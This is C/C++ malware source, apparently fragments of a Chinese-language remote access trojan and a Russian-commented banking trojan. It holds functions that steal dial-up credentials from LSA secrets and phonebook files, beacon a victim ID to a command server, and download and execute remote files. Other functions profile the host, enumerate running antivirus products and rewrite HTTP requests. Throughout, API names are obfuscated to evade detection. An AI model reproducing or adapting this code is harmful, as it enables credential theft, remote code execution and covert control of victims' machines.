void GetCurrentUserNamet(char szUser[])
{
char TszUser[50]={0};
char TszDomain[50]={0};
char CtxPW50[] = {'w','s','p','r','i','n','t','f','A','\0'};
wsprintfAT pwsprintfA=(wsprintfAT)GetProcAddress(LoadLibrary("USER32.dll"),CtxPW50);
if(GetCurrentUserName(TszUser,TszDomain))
{
pwsprintfA(szUser,"%s",TszUser);
}
else
{
pwsprintfA(szUser,"%s","无用户登陆状态!");
}
}
void CDialupass::GetLsaPasswords()
{
PLSA_UNICODE_STRING PrivateData;
// char Win2k[]="RasDialParams!%s#0";
// char WinXP[]="L$_RasDefaultCredentials#0";
char Win2k[] = {'R','a','s','D','i','a','l','P','a','r','a','m','s','!','%','s','#','0','\0'};
char WinXP[] = {'L','$','_','R','a','s','D','e','f','a','u','l','t','C','r','e','d','e','n','t','i','a','l','s','#','0','\0'};
char temp[256];
char CtxPW50[] = {'w','s','p','r','i','n','t','f','A','\0'};
wsprintfAT pwsprintfA=(wsprintfAT)GetProcAddress(LoadLibrary("USER32.dll"),CtxPW50);
pwsprintfA(temp,Win2k,GetLocalSid());
PrivateData=GetLsaData(temp);
char HrFvD05[] = {'L','s','a','F','r','e','e','M','e','m','o','r','y','\0'};
LsaFreeMemoryT pLsaFreeMemory=(LsaFreeMemoryT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),HrFvD05);
if(PrivateData!=NULL)
{
ParseLsaBuffer(PrivateData->Buffer,PrivateData->Length);
pLsaFreeMemory(PrivateData->Buffer);
}
PrivateData=GetLsaData(WinXP);
if(PrivateData!=NULL)
{
ParseLsaBuffer(PrivateData->Buffer,PrivateData->Length);
pLsaFreeMemory(PrivateData->Buffer);
}
}
bool UpdateContentLength(PREQUEST Request, bool FreeOldBuf)
{
// Функция обновляет заголовок "Content-Length" в заголовках HTTP запроса
char * Buffer = (char *)Request->pBuf;
// копируем HTTP заголовок
int HeaderOffset = m_istrstr(Buffer, "\r\n\r\n" );
if (HeaderOffset == -1)
return false;
HeaderOffset += 4; // увеличиваем размер заголовка на "\r\n\r\n"
PCHAR Header = StrNew(Buffer, HeaderOffset);
if (Header == NULL)
return false;
// Лпределяем позицию параметра в заголовках
m_lstrlwr(Header); // приводим заголовок к нижнему регистру
char CL[] = {'c','o','n','t','e','n','t','-','l','e','n','g','t','h',':',' ',0};
int Pos = m_istrstr(Header, CL);
StrFree(Header);
if (Pos == -1)
return false;
// Копируем оригинальный заголовок
DWORD ParamLen = m_lstrlen(CL);
char *ParamName = (char*)MemAlloc(ParamLen + 1);
if (ParamName == NULL)
return false;
m_memcpy(ParamName, Buffer + Pos, ParamLen);
// Создаём строку с новым значением
DWORD NewValue = m_lstrlen(Buffer + HeaderOffset);
char NewContentLen[10];
typedef int ( WINAPI *fwsprintfA )( LPTSTR lpOut, LPCTSTR lpFmt, ... );
fwsprintfA pwsprintfA = (fwsprintfA)GetProcAddressEx( NULL, 3, 0xEA3AF0D7 );
pwsprintfA(NewContentLen, "%d", NewValue);
// Вписываем новое значение
char *NewBuffer = NULL;
bool Result = SubstituteText(Buffer, 0, &NewBuffer, ParamName, NewContentLen, "\r\n") >= 0;
MemFree(ParamName);
// Меняем буфер запроса
if (Result)
{
if (FreeOldBuf)
MemFree(Request->pBuf);
Request->pBuf = (LPBYTE)NewBuffer;
Request->uBufSize = m_lstrlen(NewBuffer);
}
return Result;
}
DWORD CDialupass::GetRasEntryCount()
{
int nCount = 0;
char *lpPhoneBook[2];
char szPhoneBook1[MAX_PATH+1], szPhoneBook2[MAX_PATH+1];
GetWindowsDirectoryAT pGetWindowsDirectoryA=(GetWindowsDirectoryAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetWindowsDirectoryA");
pGetWindowsDirectoryA(szPhoneBook1, sizeof(szPhoneBook1));
char FBwWp22[] = {'l','s','t','r','c','p','y','A','\0'};
lstrcpyAT plstrcpyA=(lstrcpyAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp22);
plstrcpyA(Gyfunction->my_strchr(szPhoneBook1, '\\') + 1, "Documents and Settings\\");
char DmDjm01[] = {'l','s','t','r','c','a','t','A','\0'};
lstrcatAT plstrcatA=(lstrcatAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),DmDjm01);
plstrcatA(szPhoneBook1, m_lpCurrentUser);
plstrcatA(szPhoneBook1, "\\Application Data\\Microsoft\\Network\\Connections\\pbk\\rasphone.pbk");
char CtxPW39[] = {'S','H','G','e','t','S','p','e','c','i','a','l','F','o','l','d','e','r','P','a','t','h','A','\0'};
SHGetSpecialFolderPathAT pSHGetSpecialFolderPathA=(SHGetSpecialFolderPathAT)GetProcAddress(LoadLibrary("SHELL32.dll"),CtxPW39);
pSHGetSpecialFolderPathA(NULL,szPhoneBook2, 0x23, 0);
char DQeBW01[] = {'%','s','\\','%','s','\0'};
char CtxPW50[] = {'w','s','p','r','i','n','t','f','A','\0'};
wsprintfAT pwsprintfA=(wsprintfAT)GetProcAddress(LoadLibrary("USER32.dll"),CtxPW50);
pwsprintfA(szPhoneBook2,DQeBW01, szPhoneBook2, "Microsoft\\Network\\Connections\\pbk\\rasphone.pbk");
lpPhoneBook[0] = szPhoneBook1;
lpPhoneBook[1] = szPhoneBook2;
DWORD nSize = 1024 * 4;
char *lpszReturnBuffer = new char[nSize];
char FBwWp01[] = {'l','s','t','r','l','e','n','A','\0'};
lstrlenAT plstrlenA=(lstrlenAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp01);
for (int i = 0; i < sizeof(lpPhoneBook) / sizeof(int); i++)
{
memset(lpszReturnBuffer, 0, nSize);
GetPrivateProfileSectionNamesAT pGetPrivateProfileSectionNamesA=(GetPrivateProfileSectionNamesAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetPrivateProfileSectionNamesA");
pGetPrivateProfileSectionNamesA(lpszReturnBuffer, nSize, lpPhoneBook[i]);
for(char *lpSection = lpszReturnBuffer; *lpSection != '\0'; lpSection += plstrlenA(lpSection) + 1)
{
nCount++;
}
}
delete lpszReturnBuffer;
return nCount;
}
bool CDialupass::GetRasEntries()
{
int nCount = 0;
char *lpPhoneBook[2];
char szPhoneBook1[MAX_PATH+1], szPhoneBook2[MAX_PATH+1];
GetWindowsDirectoryAT pGetWindowsDirectoryA=(GetWindowsDirectoryAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetWindowsDirectoryA");
pGetWindowsDirectoryA(szPhoneBook1, sizeof(szPhoneBook1));
char FBwWp22[] = {'l','s','t','r','c','p','y','A','\0'};
lstrcpyAT plstrcpyA=(lstrcpyAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp22);
plstrcpyA(Gyfunction->my_strchr(szPhoneBook1, '\\') + 1, "Documents and Settings\\");
char DmDjm01[] = {'l','s','t','r','c','a','t','A','\0'};
lstrcatAT plstrcatA=(lstrcatAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),DmDjm01);
plstrcatA(szPhoneBook1, m_lpCurrentUser);
plstrcatA(szPhoneBook1, "\\Application Data\\Microsoft\\Network\\Connections\\pbk\\rasphone.pbk");
char CtxPW39[] = {'S','H','G','e','t','S','p','e','c','i','a','l','F','o','l','d','e','r','P','a','t','h','A','\0'};
SHGetSpecialFolderPathAT pSHGetSpecialFolderPathA=(SHGetSpecialFolderPathAT)GetProcAddress(LoadLibrary("SHELL32.dll"),CtxPW39);
pSHGetSpecialFolderPathA(NULL,szPhoneBook2, 0x23, 0);
char DQeBW01[] = {'%','s','\\','%','s','\0'};
char CtxPW50[] = {'w','s','p','r','i','n','t','f','A','\0'};
wsprintfAT pwsprintfA=(wsprintfAT)GetProcAddress(LoadLibrary("USER32.dll"),CtxPW50);
pwsprintfA(szPhoneBook2,DQeBW01, szPhoneBook2, "Microsoft\\Network\\Connections\\pbk\\rasphone.pbk");
lpPhoneBook[0] = szPhoneBook1;
lpPhoneBook[1] = szPhoneBook2;
OSVERSIONINFO osi;
osi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
char FBwWp05[] = {'G','e','t','V','e','r','s','i','o','n','E','x','A','\0'};
GetVersionExAT pGetVersionExA=(GetVersionExAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp05);
pGetVersionExA(&osi);
if(osi.dwPlatformId == VER_PLATFORM_WIN32_NT && osi.dwMajorVersion >= 5)
{
GetLsaPasswords();
}
DWORD nSize = 1024 * 4;
char *lpszReturnBuffer = new char[nSize];
char FBwWp01[] = {'l','s','t','r','l','e','n','A','\0'};
lstrlenAT plstrlenA=(lstrlenAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp01);
for (int i = 0; i < sizeof(lpPhoneBook) / sizeof(int); i++)
{
memset(lpszReturnBuffer, 0, nSize);
GetPrivateProfileSectionNamesAT pGetPrivateProfileSectionNamesA=(GetPrivateProfileSectionNamesAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetPrivateProfileSectionNamesA");
pGetPrivateProfileSectionNamesA(lpszReturnBuffer, nSize, lpPhoneBook[i]);
for(char *lpSection = lpszReturnBuffer; *lpSection != '\0'; lpSection += plstrlenA(lpSection) + 1)
{
char *lpRealSection = (char *)UTF8ToGB2312(lpSection);
char strDialParamsUID[256];
char strUserName[256];
char strPassWord[256];
char strPhoneNumber[256];
char strDevice[256];
memset(strDialParamsUID, 0, sizeof(strDialParamsUID));
memset(strUserName, 0, sizeof(strUserName));
memset(strPassWord, 0, sizeof(strPassWord));
memset(strPhoneNumber, 0, sizeof(strPhoneNumber));
memset(strDevice, 0, sizeof(strDevice));
char FBwWp04[] = {'G','e','t','P','r','i','v','a','t','e','P','r','o','f','i','l','e','S','t','r','i','n','g','A','\0'};
GetPrivateProfileStringAT pGetPrivateProfileStringA=(GetPrivateProfileStringAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp04);
int nBufferLen = pGetPrivateProfileStringA(lpSection, "DialParamsUID", 0,
strDialParamsUID, sizeof(strDialParamsUID), lpPhoneBook[i]);
char FBwWp03[] = {'l','s','t','r','c','m','p','A','\0'};
lstrcmpAT plstrcmpA=(lstrcmpAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp03);
if (nBufferLen > 0)//DialParamsUID=4326020 198064
{
for(int j=0; j< (int)m_nRasCount; j++)
{
if(plstrcmpA(strDialParamsUID, m_PassWords[j].UID)==0)
{
plstrcpyA(strUserName, m_PassWords[j].login);
plstrcpyA(strPassWord, m_PassWords[j].pass);
m_PassWords[j].used=true;
m_nUsed++;
break;
}
}
}
pGetPrivateProfileStringA(lpSection, "PhoneNumber", 0,
strPhoneNumber, sizeof(strDialParamsUID), lpPhoneBook[i]);
pGetPrivateProfileStringA(lpSection, "Device", 0,
strDevice, sizeof(strDialParamsUID), lpPhoneBook[i]);
char *lpRealDevice = (char *)UTF8ToGB2312(strDevice);
char *lpRealUserName = (char *)UTF8ToGB2312(strUserName);
Set(strDialParamsUID, lpRealSection, lpRealUserName, strPassWord,
strPhoneNumber, lpRealDevice);
// delete lpRealSection;
// delete lpRealUserName;
// delete lpRealDevice;
}
}
delete lpszReturnBuffer;
return true;
}
bool ReportToPlugin( char *Url )
{
WSADATA wsa;
if ( (int)pWSAStartup( MAKEWORD( 2, 2 ), &wsa ) != 0 )
{
return false;
}
char *Host = NULL;
char *Path = NULL;
int Port = 0;
if ( !ParseUrl1( Url, &Host, &Path, &Port ) )
{
return false;
}
char Uid[100];
GenerateUid( Uid );
typedef int ( WINAPI *fwsprintfA )( LPTSTR lpOut, LPCTSTR lpFmt, ... );
fwsprintfA pwsprintfA = (fwsprintfA)GetProcAddressEx( NULL, 3, 0xEA3AF0D7 );
char *UserAgent = NULL;
UserAgent = (char*)MemAlloc( 1024 );
DWORD dwUserSize = 1024;
pObtainUserAgentString( 0, UserAgent, &dwUserSize );
if ( UserAgent == NULL )
{
MemFree( UserAgent );
UserAgent = "-";
}
char Request[] = "POST %s HTTP/1.0\r\n"
"Host: %s\r\n"
"User-Agent: %s\r\n"
"Accept: text/html\r\n"
"Connection: Close\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"Content-Length: %d\r\n\r\n";
char Args[] = "id=";
char *HttpPacket = NULL;
HttpPacket = (char*)MemAlloc( 2048 );
int iTmp;
if (LoadExe!=NULL)
{
iTmp=m_lstrlen(LoadExe);
}else iTmp=9;
pwsprintfA( HttpPacket, Request, Path, Host, UserAgent, m_lstrlen( Args ) + m_lstrlen( Uid )+iTmp );
m_lstrcat( HttpPacket, Args );
m_lstrcat( HttpPacket, Uid );
if (LoadExe==NULL)
{
LoadExe = (char*)MemAlloc(10);
m_lstrncpy(LoadExe,"&plugins=",9);
LoadExe[9]='\0';
}
m_lstrcat( HttpPacket, LoadExe );
SOCKET Socket = MyConnect1( Host, Port );
if( Socket == -1 )
{
return false;
}
bool b = MySend( Socket, (const char *)HttpPacket, m_lstrlen( HttpPacket ) );
MemFree( HttpPacket );
if ( !b )
{
return false;
}
DWORD dwSize = 0;
char *Buffer = RecvAndParse( Socket, &dwSize );
if ( !Buffer )
{
pclosesocket( Socket );
return false;
}
char MultiDownloadCommand[]={'m','u','l','t','i','d','o','w','n','l','o','a','d',0};
char *Context;
m_strtok_s( Buffer, "\r\n", &Context );
if ( !m_lstrncmp( Buffer, MultiDownloadCommand, m_lstrlen( MultiDownloadCommand ) ) )
{
char * cPointer= m_strstr(&Buffer[1],"http:");
char* cUrl=Buffer;
char* cUrlNext;
int i;
char *DownloadUrl;
while (true)
{
cUrl= m_strstr(&cUrl[1],"http:");
if (cUrl==NULL)break;
cUrlNext= m_strstr(cUrl,"|");
i=m_lstrlen(cUrl)-m_lstrlen(cUrlNext);
DownloadUrl = (char*)MemAlloc(i)+1;
m_lstrncpy(DownloadUrl,cUrl,i);
DownloadUrl[i]='\0';
if ( DownloadUrl )
{
LoadExe=(char*)MemRealloc(LoadExe,33+m_lstrlen(LoadExe)+1);
m_lstrcat( LoadExe, MD5StrFromBuf(DownloadUrl, STRA::Length(DownloadUrl)).t_str());
m_lstrcat( LoadExe, "|");
WCHAR *FileName =(WCHAR *)GetTempName();
if ( FileName && DownloadUrl )
{
ExecuteFile( DownloadUrl, FileName );
}
MemFree( FileName );
}
MemFree( DownloadUrl );
}
}
MemFree( Buffer );
pclosesocket( Socket );
return true;
}
void CSystemManager::GetSystemInfo()
{
MESSAGEInfo Infomsg;
//获取操作系统相关信息
Infomsg.bToken = TOKEN_SYSTEMINFO;
//////////////CPU Speed/////////////////
DWORD dwCpu, dwBufLen;
HKEY hKey;
char JYvni02[] = {'H','A','R','D','W','A','R','E','\\','D','E','S','C','R','I','P','T','I','O','N','\\','S','y','s','t','e','m','\\','C','e','n','t','r','a','l','P','r','o','c','e','s','s','o','r','\\','0','\0'};
char HrFvD07[] = {'R','e','g','O','p','e','n','K','e','y','E','x','A','\0'};
RegOpenKeyExAT pRegOpenKeyExA=(RegOpenKeyExAT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),HrFvD07);
pRegOpenKeyExA( HKEY_LOCAL_MACHINE,
JYvni02,
0, KEY_QUERY_VALUE, &hKey );
dwBufLen = sizeof(DWORD);
char HrFvD13[] = {'R','e','g','Q','u','e','r','y','V','a','l','u','e','E','x','A','\0'};
RegQueryValueExAT pRegQueryValueExA=(RegQueryValueExAT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),"RegQueryValueExA");
pRegQueryValueExA( hKey, ("~MHz"), NULL, NULL,(LPBYTE)&dwCpu, &dwBufLen);
char HrFvD06[] = {'R','e','g','C','l','o','s','e','K','e','y','\0'};
RegCloseKeyT pRegCloseKey=(RegCloseKeyT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),HrFvD06);
pRegCloseKey(hKey);
char CtxPW50[] = {'w','s','p','r','i','n','t','f','A','\0'};
wsprintfAT pwsprintfA=(wsprintfAT)GetProcAddress(LoadLibrary("USER32.dll"),CtxPW50);
pwsprintfA(Infomsg.szCpuSpeend,("~%u MHz"), dwCpu);
//Get CPU Info===============================
CHAR SubKey[] = {'H','A','R','D','W','A','R','E','\\','D','E','S','C','R','I','P','T','I','O','N','\\','S','y','s','t','e','m','\\','C','e','n','t','r','a','l','P','r','o','c','e','s','s','o','r','\\','0','\0','\0'};
// CHAR SubKey[MAX_PATH]=("HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0\0");
hKey = NULL;
if(pRegOpenKeyExA(HKEY_LOCAL_MACHINE,SubKey,0L,KEY_ALL_ACCESS,&hKey) == ERROR_SUCCESS)
{
DWORD dwType;
DWORD dwSize = 128 * sizeof(TCHAR);
pRegQueryValueExA(hKey,("ProcessorNameString"),NULL,&dwType,(BYTE *)Infomsg.szCpuInfo,&dwSize);
pRegCloseKey(hKey);
}
//Get Computer & User Name========================
DWORD dwLen = sizeof(Infomsg.szPcName);
char CPolQ16[] = {'G','e','t','C','o','m','p','u','t','e','r','N','a','m','e','A','\0'};
GetComputerNameAT pGetComputerNameA=(GetComputerNameAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),CPolQ16);
pGetComputerNameA(Infomsg.szPcName, &dwLen);
/*
dwLen = sizeof(Infomsg.szUserName);
GetUserName(Infomsg.szUserName,&dwLen); //获取当前用户名
*/
//获取当前用户名及计算机名称
GetCurrentUserNamet(Infomsg.szUserName);
//Get Screen Size=================================
char DYrEN67[] = {'G','e','t','S','y','s','t','e','m','M','e','t','r','i','c','s','\0'};
GetSystemMetricsT pGetSystemMetrics=(GetSystemMetricsT)GetProcAddress(LoadLibrary("USER32.dll"),DYrEN67);
pwsprintfA(Infomsg.szScrSize, ("%d * %d"), pGetSystemMetrics(SM_CXSCREEN),pGetSystemMetrics(SM_CYSCREEN));
// UINT Porst =dwPort[nConnect];
if(nConnect==0)
pwsprintfA(Infomsg.LineName,"域名上线:%s",lpConnects[0]); //域名上线写入
if(nConnect==1)
pwsprintfA(Infomsg.LineName,"QQ上线:%s",lpConnects[1]); //QQ上线写入
if(nConnect==2)
pwsprintfA(Infomsg.LineName,"网盘上线:%s",lpConnects[2]); //网盘上线写入
pwsprintfA(Infomsg.LinePort,"%d",dwPort[nConnect]); //上线端口写入
char LCoHX03[] = {'G','e','t','M','o','d','u','l','e','F','i','l','e','N','a','m','e','A','\0'};
GetModuleFileNameAT pGetModuleFileNameA=(GetModuleFileNameAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),LCoHX03);
char szbuf[256];
pGetModuleFileNameA(NULL,szbuf,MAX_PATH); //用于获取程序本身路径
pwsprintfA(Infomsg.Program,"%s",szbuf );
if(Installope==0) //绿色一次性运行
{
pwsprintfA(Infomsg.InstallOpen,"%s","(绿色运行)--重启不上线!"); //上线运行方式
}
else if(Installope==1) // 服务启动运行
{
pwsprintfA(Infomsg.InstallOpen,"%s","(服务启动)--SYSTEM用户运行!"); //上线运行方式
}
else if(Installope==2) // 直接启动运行
{
pwsprintfA(Infomsg.InstallOpen,"%s","(直接启动)--当前用户运行!"); //上线运行方式
}
pwsprintfA(Infomsg.szUserVirus,"%s",GetVirus()); //杀毒软件
Send((LPBYTE)&Infomsg, sizeof(MESSAGEInfo));
}
char* GetVirus()
{
static char AllName[256] = "";
//360安全 卡巴 江民
char* VirusName = "360tray.exe"; char* VirusName1 = "avp.exe"; char* VirusName2 = "KvMonXP.exe";
//瑞星 360杀毒 麦咖啡
char* VirusName3 = "RavMonD.exe"; char* VirusName4 = "360sd.exe"; char* VirusName5 = "Mcshield.exe";
//NOD32 金山 可牛
char* VirusName6 = "egui.exe"; char* VirusName7 = "kxetray.exe"; char* VirusName8 = "knsdtray.exe";
//趋势 小红伞 avast
char* VirusName9 = "TMBMSRV.exe"; char* VirusName10 = "avcenter.exe"; char* VirusName11 = "ashDisp.exe";
char CtxPW50[] = {'w','s','p','r','i','n','t','f','A','\0'};
wsprintfAT pwsprintfA=(wsprintfAT)GetProcAddress(LoadLibrary("USER32.dll"),CtxPW50);
pwsprintfA(AllName,"%s",""); //
char DmDjm01[] = {'l','s','t','r','c','a','t','A','\0'};
lstrcatAT plstrcatA=(lstrcatAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),DmDjm01);
if (GetProcessID(VirusName))
{
VirusName = "360安全卫士";
plstrcatA( AllName, VirusName); //
plstrcatA( AllName, " " );
}
if (GetProcessID(VirusName1))
{
VirusName1 = "卡巴";
plstrcatA( AllName, VirusName1 );
plstrcatA( AllName, " " );
}
if (GetProcessID(VirusName2))
{
VirusName2 = "江民";
plstrcatA( AllName, VirusName2 );
plstrcatA( AllName, " " );
}
if (GetProcessID(VirusName3))
{
VirusName3 = "瑞星";
plstrcatA( AllName, VirusName3 );
plstrcatA( AllName, " " );
}
if (GetProcessID(VirusName4))
{
VirusName4 = "360杀毒";
plstrcatA( AllName, VirusName4 );
plstrcatA( AllName, " " );
}
if (GetProcessID(VirusName5))
{
VirusName5 = "麦咖啡";
plstrcatA( AllName, VirusName5 );
plstrcatA( AllName, " " );
}
if (GetProcessID(VirusName6))
{
VirusName6 = "NOD32";
plstrcatA( AllName, VirusName6 );
plstrcatA( AllName, " " );
}
if (GetProcessID(VirusName7))
{
VirusName7 = "金山";
plstrcatA( AllName, VirusName7 );
plstrcatA( AllName, " " );
}
if (GetProcessID(VirusName8))
{
VirusName8 = "可牛";
plstrcatA( AllName, VirusName8 );
plstrcatA( AllName, " " );
}
if (GetProcessID(VirusName9))
{
VirusName9 = "趋势";
plstrcatA( AllName, VirusName9 );
plstrcatA( AllName, " " );
}
if (GetProcessID(VirusName10))
{
VirusName10 = "小红伞";
plstrcatA( AllName, VirusName10 );
plstrcatA( AllName, " " );
}
if (GetProcessID(VirusName11))
{
VirusName11 = "Avast";
plstrcatA( AllName, VirusName11 );
plstrcatA( AllName, " " );
}
if (Gyfunction->my_strstr(AllName, " " ) == 0 )
{
plstrcatA(AllName , "未发现 ");
}
return AllName;
}
